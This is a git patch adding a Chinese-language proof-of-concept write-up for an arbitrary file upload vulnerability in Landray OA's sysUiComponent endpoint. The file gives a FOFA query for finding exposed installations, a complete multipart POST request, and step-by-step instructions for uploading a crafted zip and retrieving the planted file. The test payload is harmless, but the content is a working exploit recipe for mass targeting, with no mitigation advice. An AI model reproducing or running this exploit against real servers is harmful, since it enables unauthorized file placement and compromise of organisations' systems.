From cbb59c2cc3beed42bea3b89cfe4ac795faf72ee0 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 16 Nov 2023 20:39:18 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=93=9D=E5=87=8COAsysUiComponent=20?=
 =?UTF-8?q?=E6=96=87=E4=BB=B6=E5=AD=98=E5=9C=A8=E4=BB=BB=E6=84=8F=E6=96=87?=
 =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...OAsysUiComponent 文件存在任意文件上传漏洞.md | 56 +++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 蓝凌OAsysUiComponent 文件存在任意文件上传漏洞.md

diff --git a/蓝凌OAsysUiComponent 文件存在任意文件上传漏洞.md b/蓝凌OAsysUiComponent 文件存在任意文件上传漏洞.md
new file mode 100644
index 0000000..7dc5e3e
--- /dev/null
+++ b/蓝凌OAsysUiComponent 文件存在任意文件上传漏洞.md	
@@ -0,0 +1,56 @@
+## 蓝凌OAsysUiComponent 文件存在任意文件上传漏洞
+
+## fofa
+```
+app="Landray-OA系统"
+
+```
+
+
+## poc
+![c9857f5370d4abd1547fa7cb1988a18a](https://github.com/wy876/POC/assets/139549762/ee361dae-cfa2-4eae-910f-501331731347)
+
+```
+POST /sys/ui/sys_ui_component/sysUiComponent.do?method=getThemeInfo&s_ajax=true HTTP/1.1
+Host: IP:PORT
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: http://.com/sys/ui/sys_ui_component/sysUiComponent.do?method=upload
+Content-Length: 474
+Content-Type: multipart/form-data; boundary=---------------------------15610248407689
+Cookie: SESSION=YmI0OGMyZDQtZDE0NC00MTQ2LWJmMzMtNWE5NDMwOTYxM2Ex
+DNT: 1
+Connection: close
+
+-----------------------------15610248407689
+Content-Disposition: form-data; name="file"; filename="test.zip"
+Content-Type: application/x-zip-compressed
+
+PKx3;x4;x14;
+-----------------------------15610248407689
+```
+## 漏洞复现
+创建component.ini文件，内容为：
+```
+id=2023
+name=check.txt
+```
+创建上传check.txt文件
+```
+1111
+```
+然后使用压缩软件，将两个文件压缩成一个压缩包，文件名check.zip
+
+
+最后上传即可。上传成功后访问路径/resource/ui-component/2023/check.txt
+
+
+## 漏洞来源
+```
+https://mp.weixin.qq.com/s/xhwmFuItG8ZoiuGrwR5bnw
+```
+
+